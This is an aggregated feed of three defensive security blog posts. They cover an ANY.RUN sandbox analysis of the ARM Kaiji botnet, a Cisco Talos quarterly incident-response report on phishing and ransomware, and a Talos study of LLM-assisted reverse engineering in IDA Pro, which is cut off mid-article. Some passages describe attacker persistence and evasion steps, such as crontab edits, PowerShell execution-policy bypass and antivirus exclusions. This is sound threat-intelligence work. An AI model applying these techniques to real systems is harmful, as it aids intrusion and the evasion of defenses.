Detect ARM Malware in Seconds with Debian Sandbox for Stronger Enterprise Security 

ANY.RUN’s Interactive Sandbox provides SOC teams with the fastest solution for analyzing and detecting cyber threats targeting Windows, Linux, and Android systems. Now, our selection of VMs has been expanded to include Linux Debian 12.2 64-bit (ARM).  

With the rapid rise of ARM-based malware, the sandbox helps businesses tackle this threat through proactive analysis and early detection. 

Why ARM-based Malware is a Serious Threat to Your Company 

ARM processors are widely used in resource-constrained IoT devices, embedded systems, and even low-power servers, often deployed with weak security. These devices become prime targets for attackers looking to build massive botnets, steal resources, or gain unauthorized access. The three most popular types of ARM-based malware include: 

  • Botnets: Turning devices into “zombies” for DDoS attacks. 
  • Backdoors: Maintaining persistent unauthorized system access. 

By expanding the capabilities to identify these threats, companies can prevent large-scale incidents in their infrastructure and reduce costs associated with downtime, recovery, and incident response. 

Integrate ANY.RUN’s Interactive Sandbox in your SOC
Automate threat analysis, cut MTTD, & boost detection rate 



Contact us


Launch Your First Malware Analysis in Linux Debian (ARM) VM 

The new OS is now available to all Enterprise users, unlocking deeper analysis capabilities for ARM-based threats.  

To select the Linux Debian VM, follow these simple steps:  

  1. Open ANY.RUN’s Interactive sandbox
Click on the Operating system dropdown menu 
  1. Navigate to the New analysis window.  
  1. Open the Operating system menu 
Select Debian (ARM) from the available OS options
  1. Click on Linux Debian 12.2 (ARM, 64 bit)  
  1. Upload a file/URL you want to analyze, configure the rest of your settings, and run your analysis.  

The update further empowers your security team to detect malware and phishing early with ANY.RUN’s Interactive Sandbox: 

  • Ensure fast analysis: Accelerate triage, incident response, and threat hunting with a dedicated ARM environment for instant insights into any threat’s behavior. 
  • Cut costs: Analyze ARM-based malware along with Windows, Android, Linux x86 threats directly in ANY.RUN’s sandbox, eliminating the need for multiple platforms. 
  • Improve incident escalation: Gather rich, actionable data during Tier 1 analysis to enhance informed handoffs to Tier 2 to mitigate active attacks more effectively. 
  • Grow team’s expertise: Help your SOC analysts enhance their skills by analyzing real-world ARM threats, building confidence and knowledge through hands-on investigations. 

Real-World Use Case: Kaiji Botnet 

To demonstrate how ANY.RUN’s Linux Debian 12.2 (ARM, 64-bit) Sandbox operates, we analyzed a real-world sample of the Kaiji botnet, malware specifically compiled for the ARM architecture. 

Kaiji is a botnet that targets Linux-based servers and IoT devices. Once executed, it performs system reconnaissance, masks its presence, disables security mechanisms like SELinux, and ensures persistence through systemd services and cron jobs. It replaces core system utilities and hides malicious activity by filtering command output, all of which are captured inside the sandbox. 

Let’s take a closer look at how Kaiji behaves from the moment it lands on the sandbox: 

View real case inside sandbox 

Kaji botnet analyzed inside ANY.RUN sandbox 

Fast Detection with Instant Verdict 

In this real-world case, ANY.RUN’s Debian 12.2 ARM sandbox detected the Kaiji botnet in just 25 seconds, as shown in the top-right corner of the sandbox interface. The threat was flagged as malicious activity and accurately labeled kaiji and botnet

25 seconds for the detection of Kaiji botnet inside ANY.RUN’s Debian sandbox

This kind of speed delivers real value for security teams: 

  • Respond faster: A near-instant verdict means teams can act before the threat spreads. 
  • Reduce manual work: Quick detection cuts down time spent digging through logs or unclear alerts. 
  • Improve SOC efficiency: Faster detection supports lower MTTR and smarter alert triage. 
  • Stay ahead of evolving threats: With ARM-based malware on the rise, fast, reliable detection is key to staying protected. 

Full Visibility with Process Tree 

Beyond fast detection, ANY.RUN’s sandbox gives complete visibility into the attack’s behavior. On the right side of the screen, the process tree lays out every action taken by the malware. Clicking on each process reveals detailed information, from execution paths to commands and TTPs used. 

Malicious process with all the relevant TTPs displayed inside the interactive sandbox

In this Kaiji case, for example, we can see how the malware attempts to maintain persistence by modifying /etc/crontab to run the /.mod script every minute. This script keeps the malicious process running in the background, even if one of the persistence methods fails; a tactic clearly visible and traceable through the sandbox’s behavioral logs. 

Kaji botnet maintains persistence by modifying /etc/crontab 

This level of insight helps SOC teams not only detect threats quickly, but understand them deeply, supporting better response, reporting, and threat hunting. 

Track Network and File Activity in Real Time 

Just below the VM window, ANY.RUN displays all network connections and file modifications made by the malware, offering analysts a complete picture of how the threat operates. 

In this case, Kaiji’s behavior is clearly visible: the malware replaces key system utilities and intercepts user commands, passing them to the original tools while filtering the output to hide signs of infection. This is handled via the /etc/profile.d/gateway.sh script, which uses sed to remove specific keywords like 32676, dns-tcp4, and the names of hidden files from command output; a stealthy evasion technique that can be easily overlooked without deep behavioral analysis. 

Kaji replaces core system utilities via the /etc/profile.d/gateway.sh script 

With this visibility, security teams can trace every move, catch hidden modifications, and build accurate IOCs for future detection and response. 

Complete Results, Ready to Investigate or Share 

Once the analysis is complete, ANY.RUN’s sandbox gives you everything you need to take the next step. The IOCs tab gathers all critical indicators, including IPs, domains, file hashes, and more, in one place, so there’s no need to jump between views or dig through raw logs. 

IOCs neatly organized inside ANY.RUN’s sandbox 

You’ll also get a clear, structured report that maps out the full attack chain from start to finish. Whether you’re documenting a case, sharing findings with your team, or enriching threat intelligence feeds, the report is built to support fast, confident action. 

Exportable sandbox report with complete attack chain overview 

This end-to-end visibility makes every investigation smoother, and every response stronger. 

About ANY.RUN 

Trusted by over 500,000 security professionals and 15,000+ organizations across finance, healthcare, manufacturing, and beyond, ANY.RUN helps teams investigate malware and phishing threats faster and with greater precision. 

Accelerate investigation and response: Use ANY.RUN’s Interactive Sandbox to safely detonate suspicious files and URLs, observe real-time behavior, and extract critical insights, cutting triage and decision time dramatically. 

Enhance detection with threat intelligence: Leverage Threat Intelligence Lookup and TI Feeds to uncover IOCs, tactics, and behavior patterns tied to active threats, 6empowering your SOC to stay ahead of attacks as they emerge. 

Request a trial of ANY.RUN’s services to see how they can boost your SOC workflows. 

The post Detect ARM Malware in Seconds with Debian Sandbox for Stronger Enterprise Security  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

Phishing remained the top method of initial access this quarter, appearing in a third of all engagements – a decrease from 50 percent last quarter. Threat actors largely leveraged compromised internal or trusted business partner email accounts to deploy malicious emails, bypassing security controls and gaining targets’ trust. Interestingly, the objective of the majority of observed phishing attacks appeared to be credential harvesting, suggesting cybercriminals may consider brokering compromised credentials as simpler and more reliably profitable than other post-exploitation activities, such as engineering a financial payout or stealing proprietary data.   

Ransomware and pre-ransomware incidents made up half of all engagements this quarter, similar to last quarter. Cisco Talos Incident Response (Talos IR) responded to Qilin ransomware for the first time, identifying previously unreported tools and tactics, techniques, and procedures (TTPs), including a new data exfiltration method. Our observations of Qilin activity indicate a potential expansion of the group and/or an increase in operational tempo in the foreseeable future, warranting this as a threat to monitor. Additionally, ransomware actors leveraged a dated version of PowerShell, PowerShell 1.0, in a third of ransomware and pre-ransomware engagements this quarter, likely to evade detection and gain more flexibility for their offensive capabilities.

Actors leverage compromised email accounts for phishing attacks aimed at credential harvesting   

As mentioned above, threat actors used phishing for initial access in a third of engagements this quarter, a decrease from 50 percent last quarter when it was also the top observed initial access technique. However, last quarter featured a dominant voice phishing (vishing) campaign deploying Cactus and Black Basta ransomware that was significantly less present this quarter, potentially contributing to this decline.  

Threat actors largely leveraged compromised internal or trusted business partner email accounts to send malicious emails, which appeared in 75 percent of engagements where phishing was used for initial access. Using a legitimate trusted account affords an attacker numerous advantages, such as potentially bypassing an organization’s security controls as well as appearing more trustworthy to the recipient. For example, in one phishing engagement, the targeted organization’s users were victims of a phishing campaign sent from the compromised email address of a legitimate business partner. The phishing emails leveraged malicious links directing victims to a fake Microsoft O365 login page that prompted visitors to authenticate with MFA, likely so the attacker could steal users’ credentials and session tokens. 

We assess that credential harvesting was the end goal in the majority of phishing attacks this quarter, such as in the example highlighted above. Though the tactic of leveraging compromised valid email accounts is often associated with business email compromise (BEC) attacks, this observation suggests cybercriminals may consider brokering compromised credentials to be more reliably profitable than attempting to manipulate a target into making a financial payout. Further, not including a financial request in the email body likely makes an email less suspicious to a victim, potentially raising the chances of a successful attack. In one engagement, an attacker successfully compromised a user’s email account after the user clicked a link within a phishing email and provided their credentials to the phishing site. The adversary proceeded to send multiple internal spear phishing emails as the compromised user with a link to an internal SharePoint link, which then directed to a credential harvesting page that successfully tricked approximately a dozen additional users into entering their credentials.

Ransomware trends 

Ransomware and pre-ransomware incidents made up half of all engagements this quarter, similar to last quarter. Talos IR observed Qilin and Medusa ransomware for the first time, while also responding to previously seen Chaos ransomware. 

Qilin ransomware activity showcases previously unreported TTPs and suggests increased operational tempo    

We responded to a Qilin ransomware incident for the first time this quarter, identifying tools and TTPs that have not been previously publicly reported. Specifically, we observed the operators leveraging a suspected custom compiled encryptor with hardcoded victim user credentials, Backblaze-hosted command and control (C2) infrastructure, and file transfer tool CyberDuck, an exfiltration method not previously associated with this threat actor or its affiliates. The threat actors likely leveraged stolen valid credentials to gain initial access, then used a combination of commercial remote monitoring and management (RMM) solutions to facilitate lateral movement and data staging, including TeamViewer, VNC, AnyDesk, Chrome Remote Desktop, Distant Desktop, QuickAssist, and ToDesk. To ensure persistent access until encryption was completed, the actors created an AutoRun entry in the Software registry Hive on each infected system to trigger the ransomware execution each time the system was rebooted and a scheduled task to silently relaunch Qilin at every new logon. These attack techniques ultimately led to a widespread infection requiring a complete rebuild of the Active Directory (AD) domain and password resets for all accounts.

IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

Looking forward: Our analysis of Qilin activity this quarter indicates a potential expansion of the group of affiliates and/or an increase in operational tempo. In addition to this engagement, we saw additional Qilin ransomware activity kick off this quarter, but did not include it in our Q2 statistics as analysis was still ongoing after the quarter ended. Further, posts on the group’s data leak site show a doubling of disclosures since February 2025, suggesting this is a ransomware threat to monitor for the foreseeable future.

IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

The North Korean state-sponsored cyber group Moonstone Sleet reportedly began deploying Qilin ransomware last February, and some security firms believe that affiliates from the RansomHub ransomware-as-a-service (RaaS) — whose data leak site went offline in early April 2025 — have also joined Qilin. After the RansomHub data leak site went offline, Qilin members were observed engaging with active RansomHub members and advertising an updated version of Qilin, likely in attempts to recruit new affiliates and expand operations.

Ransomware actors leverage dated version of PowerShell to evade detection   

In a third of ransomware and pre-ransomware engagements this quarter, threat actors leveraged PowerShell 1.0, an older version of the scripting language that is most up-to-date at version 7.4. Using this insecure version gives attackers numerous potential advantages as it lacks security features that newer versions have built in, such as script block logging, which logs the content of executed scripts, and transcription logging, which records all input/output in PowerShell sessions. It also lacks an antimalware scan interface (AMSI), which allows antivirus tools to scan PowerShell code before it’s executed. Additionally, some endpoint detection and response (EDR) tools are designed to monitor behaviors typical of newer PowerShell versions, potentially enabling attackers to evade signature and behavior-based detections.   

We observed threat actors leveraging PowerShell 1.0 for both defense evasion and discovery in ransomware and pre-ransomware engagements this quarter. For example, in a Medusa ransomware engagement, we saw the adversary using PowerShell 1.0 to add the folder “C:Windows” to the exclusion list of the victim’s antivirus (AV) solution, meaning the AV would not scan or monitor anything under the core operating system directory, severely compromising defenses. In a pre-ransomware engagement, the adversary leveraged PowerShell 1.0 to bypass script execution policy restrictions with the command “-ExecutionPolicy Bypass” and monitor peer-to-peer file transfers in the victim network. Ultimately, this tactic can make adversaries’ activity quieter from a logging perspective and give them more flexibility in terms of what they can perform on the system. Therefore, organizations should enforce use of PowerShell 5.0 or greater on all systems.

Targeting 

Education was the most targeted industry vertical this quarter, a shift from last quarter when we did not see any engagements targeting education organizations. This trend is in line with observations documented in our 2024 Year in Review report, where we noted that the education sector saw the most ransomware attacks during the month of April, with a high volume of attacks in May and June as well. Additionally, education was also the most targeted vertical in FY24 Q3 and FY24 Q4.

IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

Initial access 

As mentioned, the most observed means of gaining initial access was phishing, followed by valid accounts, then exploitation of public facing applications and brute force attacks.

IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

Recommendations for addressing top security weaknesses

IR Trends Q2 2025: Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy

Implement properly configured MFA and other access control solutions 

Over 40 percent of engagements this quarter involved MFA issues, including misconfigured MFA, lack of MFA, and MFA bypass. In multiple engagements, threat actors capitalized on MFA products that were configured to enable self-service, adding attacker-controlled devices as authentication methods to bypass this defense and establish a path of persistence. Talos IR recommends monitoring and alerting on the following for effective MFA deployment: abuse of bypass codes, registration of new devices, creation of accounts designed to bypass or be exempt from MFA, and removal of accounts from MFA.  

Configure robust and centralized logging capabilities across the environment  

A quarter of engagements involved organizations with insufficient logging capabilities that hindered investigative efforts. Understanding the full context and chain of events performed by an adversary on a targeted host is vital not only for remediation but also for enhancing defenses and addressing any system vulnerabilities for the future. To address this issue, Talos IR recommends organizations implement a Security Information and Event Management (SIEM) solution for centralized logging. In the event an adversary deletes or modifies logs on the host, the SIEM will contain the original logs to support a forensics investigation. Further, organizations should deploy a web application firewall (WAF) and enable flow logging for all endpoints across the environment for real-time threat monitoring and detection, which can facilitate a swifter response to potential incidents and enhanced context for investigative efforts. As highlighted last quarter and in a recent blog, a quick response time is a key variable that affects the severity and impact of cyber attacks. 

Protect endpoint security solutions  

Finally, in a slight increase from last quarter, a quarter of incidents involved organizations that did not have protections in place to prevent tampering with EDR solutions, enabling actors to disable these defenses. Talos IR strongly recommends ensuring endpoint solutions are protected with an agent or connector password and customizing their configurations beyond the default settings. Additional recommendations for hardening EDR solutions against this threat can be found in our 2024 Year in Review report.

Top-observed MITRE ATT&CK techniques  

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note that this is not an exhaustive list.  

Key findings from the MITRE ATT&CK framework include:  

  • Adversaries leveraged a wider variety of techniques for credential access this quarter compared to last quarter, including kerberoasting, brute force attacks, credential harvesting pages, OS credential dumping, and adversary-in-the-middle attacks.
  • This was the second quarter in a row where phishing was the top initial access technique, with threat actors leveraging both vishing and malicious links.

Tactic 

Technique 

Example 

Reconnaissance (TA0043)  

T1593 Search Open Websites/Domains 

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. 

 

T1595.002 Active Scanning: Vulnerability Scanning 

Adversaries may run vulnerability scans against an organization’s public-facing infrastructure to identify potential vulnerabilities to exploit.   

Initial Access (TA0001) 

T1598.004  Phishing for Information: Spearphishing Voice   

Adversaries may use voice communications to elicit sensitive information that can be used during targeting. 

 

T1598.003 Phishing for Information: Spearphishing Link 

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. 

 

 T1078 Valid Accounts 

Adversaries may use compromised credentials to access valid accounts during their attack. 

 

T1190 Exploit in Public-Facing Application 

Adversaries may exploit a vulnerability to gain access to a target system. 

 

T1110 Brute Force   

Adversaries may systematically guess users’ passwords using a repetitive or iterative mechanism. 

Execution (TA0002)  

T1204 User Execution 

Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious file or link. 

 

T1059.001 Command and Scripting Interpreter: PowerShell 

Adversaries may abuse PowerShell to execute commands or scripts throughout their attack. 

 

T1047 Windows Management Instrumentation 

Adversaries may use Windows Management Instrumentation (WMI) to execute malicious commands during the attack. 

 

T1569 System Services   

Adversaries may abuse system services or daemons to execute commands or programs. 

Persistence (TA0003) 

T1556 Modify Authentication Process   

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. 

 

T1078 Valid Accounts 

Adversaries may obtain and abuse credentials of existing accounts, potentially bypassing access controls placed on various resources on systems within the network. 

 

T1053 Scheduled Task/Job   

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. 

Privilege Escalation (TA0004)   

T1484 Domain or Tenant Policy Modification   

Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. 

 

T1055 Process Injection   

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. 

Defense Evasion (TA0005)  

T1562.001 Impair Defenses: Disable or Modify Tools 

Adversaries may disable or uninstall security tools to evade detection. 

 

T1070 Indicator Removal   

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. 

 

T1133 External Remote Services  

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. 

 

T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control   

Adversaries may bypass UAC mechanisms to elevate process privileges on system. 

Credential Access (TA0006)  

T1003 OS Credential Dumping 

Adversaries may dump credentials from various sources to enable lateral movement. 

 

T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force. 

 

T1110 Brute Force 

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. 

Cisco Talos Blog – ​Read More

Using LLMs as a reverse engineering sidekick

  • This research explores how large language models (LLMs) can complement, rather than replace, the efforts of malware analysts in the complex field of reverse engineering. 
  • LLMs may serve as powerful assistants to streamline workflows, enhance efficiency, and provide actionable insights during malware analysis. 
  • We will showcase practical applications of LLMs in conjunction with essential tools like Model Context Protocol (MCP) frameworks and industry-standard disassemblers and decompilers, such as IDA Pro and Ghidra. 
  • Readers will gain insights into which models and tools are best suited for common challenges in malware analysis and how these tools can accelerate the identification and understanding of unknown malicious files. 
  • We also show how some common hurdles faced when using LLMs may influence the results, like cost increases due to tool usage and limitations of input context size in local models.

Talos’ suggested approach 

Using LLMs as a reverse engineering sidekick

As the adoption of LLMs accelerates across industries, concerns about their potential to replace human expertise have become widespread. However, rather than viewing it as a threat to human expertise, we can consider LLMs as powerful tools to help malware researchers in our work. 

We seek to show with this research that even by using low-cost tools and hardware, a malware researcher can take advantage of this technology to improve their work.  

This blog covers the different choices of client applications available to interact with LLMs and disassemblers, the features to consider when choosing the best language model and the available plugins to integrate these applications into a solid framework to help during a malware analysis session. 

For our tests, we decided to use a setup composed of a MCP server which implements integration with IDA-PRO and a MCP client based on VSCode. With this stack, we show how MCP servers can be used to help the language model execute tasks based on user input or in reaction to information found in the malicious code. 

This blog also provides a step-by-step guide on how to set up your environment to achieve a basic setup to use an LLM with a local model running on your GPU.  

Introduction to MCP 

The Model Context Protocol (MCP) is an open protocol that standardizes how applications provide context to LLM clients and models. Tools and data sources made available by MCP servers provide the context, and the LLM model can choose which tool or data source to access based on user request or autonomously select it during runtime.  

MCP servers implement tools using code and a description instructing the LLM on how to use each tool. The code can implement any kind of task, be it accessing API integration, file or network access, or any other automation necessary.

Using LLMs as a reverse engineering sidekick
Figure 1. Diagram showing how an MCP server connects to other components in a typical setup.

These components can all be installed on the same or separate machines as needed. For example, the local LLM model may run on a separate server with better GPUs while IDA Pro and MCP server may be on a different machine with more restricted access, due to it being used to handle malware.  

Choosing the right tools for the trade 

A user interacts with an MCP server through an MCP client, which serves as the main interface to query the LLM model, exchange data with MCP servers and display this data back to the user. These clients can be any application which supports the MCP protocol, such as the Claude.AI Desktop or Visual Studio Code (VSCode), using any of the MCP client extensions available in their marketplace.  

For this blog, we use VSCode with the Cline MCP client extensions, but any of the many extensions currently available can be used. The most popular ones are: 

For local implementations, the inference engine imposes another choice to make. There are several open-source engines with different levels of performance and usage complexity. Some of them are Python frameworks like vLLM, others are C++ with Python-bindings and can be deployed on full servers that can be contacted via a REST API like LLama.CPP or Ollama. They all have advantages and disadvantages and an analysis between them is beyond the scope of this article. For our experiments we decided to use Ollama, mainly for its simplicity of use. 

Model selection criteria 

The next component needed is an LLM. These can be either a cloud-based model or a locally running model. Most of the MCP clients support a wide range of cloud-based services and have pre-configured settings for them. For locally running models, using the Ollama inference engine with one of their supported models is one of the most compatible solutions. 

When choosing which model to use with MCP servers, some features need to be taken into consideration. This is due to the way MCP client interacts with the model and the MCP servers. 

First, the model must support prompts with structured instructions. This is how the client will inform the model about what MCP tools are available, what they are used for and the template syntax on how to use them. 

The model must also support large input context windows, so it’s able to parse large code bases and follow up analysis. This is needed so the client can pass all the necessary information to the model in the same query.  

When the MCP client sends a query to the model, it puts into a single prompt all the information provided by the MCP server about what tools are available and how each one is used, generic instructions optimized for the model, and the prompt entered by the user. If it is a follow-up query, any output from previous commands is also added to the prompt, like the full decompilation of a function or a list of strings. As a result, this can quickly make the prompt reach the maximum input context the model or the inference engine supports. 

This is less of a problem for cloud-based models, as it mainly influences the price of each request, and more of a problem for local models using the Ollama inference engine, which may truncate the prompt and provide invalid responses since it lacks all the context.  

Due to these restrictions, models that are not trained specifically to handle tool usage or structured instructions may not be ideal to use with MCP servers and may cause hallucinations during code analysis. 

For our study, we use the Ollama inference engine with Devstral:24b as a local LLM option and Antrophic’s Claude 3.7 Sonnet (claude-3-7-sonnet-20250219) as cloud-based model, as these models are specifically targeted for tools use and code analysis. Alternative models may be used in case of hardware restrictions, cost effectiveness, or user preference.  

Some other points that need to be considered when choosing a local vs cloud-based model are: 

  • Cost: Cloud-based models tend to charge for API access based on the number of tokens used in input queries and their responses. Analyzing large files with follow-up questions while keeping the context may quickly increase the cost associated with each prompt. On the other hand, local models tend to be slower and use the GPUs at maximum power, increasing the hidden cost of energy used to keep the machine up for the extension of the analysis. Local models also have an upfront cost of acquiring the necessary hardware to run the model, which does not exist for cloud-based models. 
  • Privacy and confidentiality: when using a cloud-based service, it is assumed that all information about the file being analyzed will be sent to the cloud LLM provider. Depending on the type of file being analyzed, this could break confidentiality rules imposed by employers or customers requesting the analysis.  
  • Speed: LLMs are processor- and memory-intensive applications. While running an LLM on a local single-GPU machine may have advantages in terms of confidentiality and cost, it is a much slower process than running the same on a cloud-based service. The same analysis which may take minutes to run on a cloud-based LLM may take several hours to run on a local LLM. Adding to this problem, once the model and context exceed the available GPU memory, the LLM may switch to using the CPU instead of (or in addition to) the GPU. This makes the process even slower. 

IDA Pro MCP servers 

The MCP server is usually composed of two parts, one of which is the plugin that runs inside the disassembler and performs the actions requested by the user, like renaming functions and variables, getting the disassembly or decompilation of a function or any other tasks implemented by the plugin. These functions are implemented as remote procedure calls (RPCs) which are made available to the client via the MCP server as “tools.” 

The second component is the MCP server which will interact with the plugin and wait for instructions from the MCP client. This server uses the Server Sent Events (SSE) protocol to communicate with the client and expose the tools configured in the plugin. Each MCP server will implement their own set of tools, so it’s up to the user to choose the ones that best adapt to their needs. Below is a partial list of existing MCP servers for use with IDA Pro or Ghidra: 

To summarize how we set up our environment for this research, this is what we are using: 

  • Local model with Ollama and Devstral 
  • Cloud-based LLM using Anthropic’s Claude Sonnet 3.7 
  • MCP Server by Duncan Ogilvie (Mrexodia) with its plugin configured in IDA Pro 
  • Installed and configured Cline plugin in VSCode 

For our analysis, the setup utilized was a Desktop machine running on an AMD Ryzen 7 9800X3D at 4.7ghz, 64Gb DDR5 6000 RAM, 3Tb SSD and an NVIDIA 5070 Ti 16Gb GPU, which can be considered a medium/high end consumer desktop. 

Using LLM to analyze a real-world sample 

Using the setup previously defined, let’s analyze a malicious file and compare the results between human analysis, local LLM and cloud-based LLM. The sample we are going to use is in fact an old IcedID sample which has been extensively reversed and documented using Hex-Rays’s Lumina database. This way we have a common base to compare the results from different LLMs.  

This may imply that these analysis results may have gone into the training data of both models and may influence the results, but our intention is to compare how both LLMs fare against each other. 

  • 7412945177641e9b9b27e601eeda32fda02eae10d0247035039b9174dcc01d12 

This is a small sample, with about 37 defined functions, which will be important to consider when analyzing the results. A bigger sample with hundreds of functions will have a different impact on the analysis as we will discuss it later.  

Creating the prompts 

Perhaps the most important step in making efficient use of an LLM is defining the right prompts to query the model. A good prompt not only will give you a better result in the analysis but may as well make the query less expensive and faster to finish while reducing the chances of hallucinations. 

For this example, we used a prompt template suggested by Mrexodia on his Github page, with some improvements and changes to cover different types of analysis after some experimentation. Our intention was to use the exact same prompt for both local and cloud-based LLM, and cover three different situations which may be common during malware analysis: 

  • Top-down analysis from the program entry point 
  • Figuring out what a specific function does and how it is used by the application 
  • Analyse all unknown functions and rename them to make it easy to understand the rest of the code 

To cover these examples, we created three prompts (Figures 2 – 4), which were used for all cases discussed.  

Please note that these prompts are not optimized and most definitely can be further improved. For example, the local model would benefit from smaller prompts with less steps to execute, to keep the input context small, while the cloud-based model benefits more from prompts including all necessary steps, in concise form, so it avoids extra cost of submitting several small prompts and their associated MCP instructions. However, in this case, all three prompts needed to be generic enough to be used in all our cases without changes to create a fair comparison.  

Another important note is that we do not explicitly say in the prompt that the file was malicious, as this caused the model to assume every function was malicious, and that caused a bias in their analysis. 

Your task is to analyze an unknown file which is currently open in IDA Pro. You can use the existing MCP server called "ida-pro" to interact with the IDA Pro instance and retrieve information, using the tools made available by this server. In general use the following strategy:

- Start from the function named "StartAddress", which is the real entry point of the code
- If this function call others, make sure to follow through the calls and analyze these functions as well to understand their context
- If more details are necessary, disassemble or decompile the function and add comments with your findings
- Inspect the decompilation and add comments with your findings to important areas of code
- Add a comment to each function with a brief summary of what it does 
- Rename variables and function parameters to more sensible names
- Change the variable and argument types if necessary (especially pointer and array types)
- Change function names to be more descriptive, using VIBE_ as prefix. 
- NEVER convert number bases yourself. Use the convert_number MCP tool if needed!
- When you finish your analysis, report how long the analysis took
- At the end, create a report with your findings. 
- Based only on these findings, make an assessment on whether the file is malicious or not.

Figure 2. Prompt 1: Perform a top-down analysis on the sample starting from its entry-point function.

Your task is to analyze an unknown file which is currently open in IDA Pro. You can use the existing MCP server called "ida-pro" to interact with the IDA Pro instance and retrieve information, using the tools made available by this server. In general use the following strategy:

- what does the function sub_1800024FC do? 
- If this function call others, make sure to follow through the calls and analyze these functions as well to understand the context
- Addditionally, if you encounter Windows API calls, document by adding comments to the code what the API call does and what parameters it accept. Rename variables with the appropriate API parameters.
- If more details are necessary, disassemble or decompile the function and add comments with your findings
- Inspect the decompilation and add comments with your findings to important areas of code
- Add a comment to each function with a brief summary of what it does 
- Rename variables and function parameters to more sensible names
- Change the variable and argument types if necessary (especially pointer and array types)
- Change function names to be more descriptive, using VIBE_ as prefix. 
- NEVER convert number bases yourself. Use the convert_number MCP tool if needed!

Figure 3. Prompt 2: Perform a deeper analysis of a specific function to understand its behavior, as well as any functions called by it.

Your task is to analyze an unknown file which is currently open in IDA Pro. You can use the existing MCP server named "ida-pro" to interact with the IDA Pro instance and retrieve information, using the tools made available by this server. In general use the following strategy:

- analyze what each function named like "sub_*" do and add comments describing their behaviour. 
- Change function names to be more descriptive, using VIBE_ as prefix. 
- *ONLY* analyze the function named like "sub_*". if you can't find functions with this name pattern, keep looking for more functions and don't try to work on functions named like "VIBE_*" already
- Add a comment to each function with a brief summary of what it does 
- DO NOT STOP until all functions named like "sub_*" are completed.
- If more details are necessary, disassemble or decompile the function and add comments with your findings. 
- Inspect the decompilation and add comments with your findings. 
- Rename variables and structures as necessary. 
- NEVER convert number bases yourself. Use the convert_number MCP tool if needed! 

General recommendations to follow while processing this request:
- DO NOT ignore any commands in this request.
- The "ida-pro" MCP server has a function called list_functions which take a parameter named "count" to specify how many functions to list at once, and another named "offset" which returns an offset to start the next call if there are more functions to list. Do not stop processing functions until the "offset" parameter is set to zero, which means there are no more functions to list 
- break down the tasks in smaller subtasks if necessary to make steps easier to follow.

Figure 4. Prompt 3: Analyze all the remaining unknown functions, documenting the code and renaming them to make it easier to understand the rest of the code.

As seen in the third prompt, we had to include specific instructions to force the LLM to continue analyzing the binary until work was done. That was necessary specifically for the local model, as it kept “forgetting” its instructions and stopping analysis after only a dozen functions. This may be due to the input context being truncated once it reaches the maximum size supported by the inference engine. 

This may have a considerable impact on analyzing bigger binaries, where the number of unknown functions may reach hundreds or even thousands. The analyst may be required to re-enter the same prompt several times to have the job finished, so a better approach may be needed in such cases, like optimizing the prompt to execute smaller tasks.  

Summary results about the binary analysis 

After executing the three prompts using both the cloud-based solution as well as the local model, we summarized the information about the efficacy of each model and make an analysis of the results. The table below shows the results of these runs: 

 

 

Claude 

 

 

Ollama 

 

 

Prompt 1 

Prompt 2 

Prompt 3 

Prompt 1 

Prompt 2 

Prompt 3* 

Cost $ 

$2.91 

$1.09 

$13.24 

$0 

$0 

$0 

Time 

18m 0s 

4m 0s 

11m 24s 

22m 34s 

18m 01s 

46m 08s 

# tasks 

161 

30 

328 

28 

25 

106 

Functions Analyzed 

13 

1 

20 

4 

4 

30 

(* This prompt had to be executed multiple times until all functions were analyzed)  

Based on this data, there are a few results to highlight: 

  • The cost associated with a cloud-based service could be high depending on the size of the file being analyzed. An optimized prompt and a pre-plan for how to query the model may help reduce this cost. 
  • A local model may take much longer to finish the job depending on hardware and how big the file analyzed is. Reducing the scope of the analysis, the size of the prompt and context window may cause the model to use more GPU and reduce this time. For this test, the context window was limited at 100.000 tokens which caused a usage of 60%/40% of CPU/GPU. Smaller context windows caused too many hallucinations due to truncated context, and bigger context windows caused too much CPU to be used, which increased the time taken to finish the queries several times. 
  • The cloud-based model executed many more tasks than the local model, which means it was more thorough in analyzing the sample. This is clear when you see the results below where the code is much better documented, and the resulting analysis is much closer to the expected result. This is expected since the cloud model has access to a much bigger input context than the local model. This lack of context sometimes caused the local model to “forget” the instructions and stop halfway through the analysis.  

Comparing the results: Human vs. cloud-based LLM vs. local LLM 

We performed the test by running each prompt through a clean IDA database without prior human analysis. For the local model, each prompt was executed as a separate task, without keeping context from the previous prompt due to the limitation in the context window size. The cloud-based test was done as a single sequential task; that is, each prompt was sent in the same chat window as the previous one to retain context from previous analyses. 

The results were then compared to the same sample populated with Lumina data, which contains human-made analyses for each function. Figure 5 details the results, where each line represents the same function in all three tests: 

Using LLMs as a reverse engineering sidekick
